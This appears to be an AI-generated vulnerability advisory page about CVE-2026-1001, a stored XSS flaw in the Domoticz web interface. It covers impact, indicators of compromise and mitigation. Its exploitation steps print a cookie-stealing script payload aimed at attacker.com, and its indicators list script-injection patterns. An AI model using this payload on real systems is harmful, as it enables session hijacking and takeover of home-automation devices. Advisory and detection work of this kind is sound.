CVE-2026-1001
NixOS vulnerability analysis and mitigation

Overview

CVE-2026-1001 is a stored cross-site scripting (XSS) vulnerability in the Domoticz home automation platform affecting all versions prior to 2026.1. The flaw exists in the "Add Hardware" and "rename device" functionality of the Domoticz web interface, allowing authenticated administrators to inject and store malicious scripts or HTML markup. It was published on March 25, 2026, with the CVE assigned by VulnCheck. The vulnerability carries a CVSS v3.1 base score of 4.8 (Medium) and a CVSS v4.0 base score of 4.8 (Medium) (Red Hat Advisory, Red Hat Bugzilla).

Technical details

The root cause is improper neutralization of user-supplied input during web page generation (CWE-79), specifically the absence of proper output encoding when rendering hardware names and device names in the Domoticz web interface. An authenticated administrator can supply crafted names containing <script> tags or other HTML markup via the Add Hardware or rename device endpoints; this input is stored server-side and subsequently rendered unsanitized in the browsers of any user viewing the affected page. Exploitation requires network access to the Domoticz web interface, administrator-level credentials, and a victim user to view the affected page (user interaction required). No public proof-of-concept code has been identified (Red Hat Bugzilla, Red Hat Advisory).

Impact

Successful exploitation causes arbitrary script execution in the browsers of users viewing the affected Domoticz web interface pages, enabling unauthorized actions within their session context. The primary impacts are limited confidentiality loss (e.g., session token theft) and integrity loss (e.g., unauthorized actions performed on behalf of the victim user); availability is not affected. Because Domoticz controls IoT and home automation hardware, session hijacking could potentially allow an attacker to manipulate connected devices or exfiltrate configuration data (Red Hat Advisory, Red Hat Bugzilla).

Exploitability

There is no evidence of public proof-of-concept code or active in-the-wild exploitation at this time. The EPSS score is approximately 0.07%, reflecting a low probability of exploitation in the near term. No threat actor attribution has been reported, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is constrained by the requirement for administrator-level credentials and victim user interaction (Red Hat Advisory).

Exploitation steps

  1. Reconnaissance: Identify a Domoticz instance running a version prior to 2026.1 that is accessible over the network, using tools such as Shodan or direct network scanning.
  2. Authenticate as administrator: Log in to the Domoticz web interface using valid administrator credentials.
  3. Inject malicious payload via Add Hardware: Navigate to the "Add Hardware" functionality and supply a crafted hardware name containing a script payload, e.g., <script>document.location='http://attacker.com/steal?c='+document.cookie</script>.
  4. Alternatively, inject via rename device: Use the "rename device" feature to set a device name containing the same or similar XSS payload.
  5. Payload storage: The malicious name is stored in the Domoticz backend without proper output encoding.
  6. Victim triggers execution: When any user (including non-admin users) views the affected hardware or device listing page, the stored script executes in their browser, potentially stealing session cookies or performing actions on their behalf (Red Hat Bugzilla, Red Hat Advisory).

Indicators of compromise

  • Logs: Domoticz web server access logs showing POST requests to hardware configuration or device rename endpoints with names containing <script>, javascript:, onerror=, or other HTML/script markup patterns.
  • Application Data: Domoticz database entries for hardware names or device names containing HTML tags or JavaScript code.
  • Network: Outbound HTTP requests from user browsers to unexpected external domains shortly after viewing the Domoticz hardware or device listing pages (potential session cookie exfiltration).
  • Browser: Unexpected redirects or resource loads to external URLs originating from the Domoticz web interface domain.

Mitigation and workarounds

The primary remediation is to upgrade Domoticz to version 2026.1 or later, which contains fixes for this vulnerability (Red Hat Advisory). As interim mitigations, restrict administrator privileges to only fully trusted users, implement a Content Security Policy (CSP) on the Domoticz web interface to block inline script execution, and monitor administrator activity for suspicious hardware additions or device renames containing HTML or script markup. Fedora packages have also been updated to address this issue (Linux Security Fedora Advisory).

Community reactions

The vulnerability received routine coverage from Linux distribution security channels, including Fedora and Rocky Linux advisories, and was noted in German-language security news (pro-linux.de). No significant vendor statements beyond the patch release or notable researcher commentary have been identified. Social media activity was limited to automated CVE notification accounts.

Additional resources


SourceThis report was generated using AI

Related NixOS vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-18713HIGH8.8
  • NixOS logoNixOS
  • i
NoNoAug 12, 2026
CVE-2026-18669HIGH8.8
  • NixOS logoNixOS
  • i
NoNoAug 12, 2026
CVE-2026-18235HIGH8.3
  • NixOS logoNixOS
  • i
NoNoAug 12, 2026
CVE-2026-17420MEDIUM6.3
  • NixOS logoNixOS
  • i
NoNoAug 12, 2026
CVE-2026-18250MEDIUM5
  • NixOS logoNixOS
  • i
NoNoAug 12, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management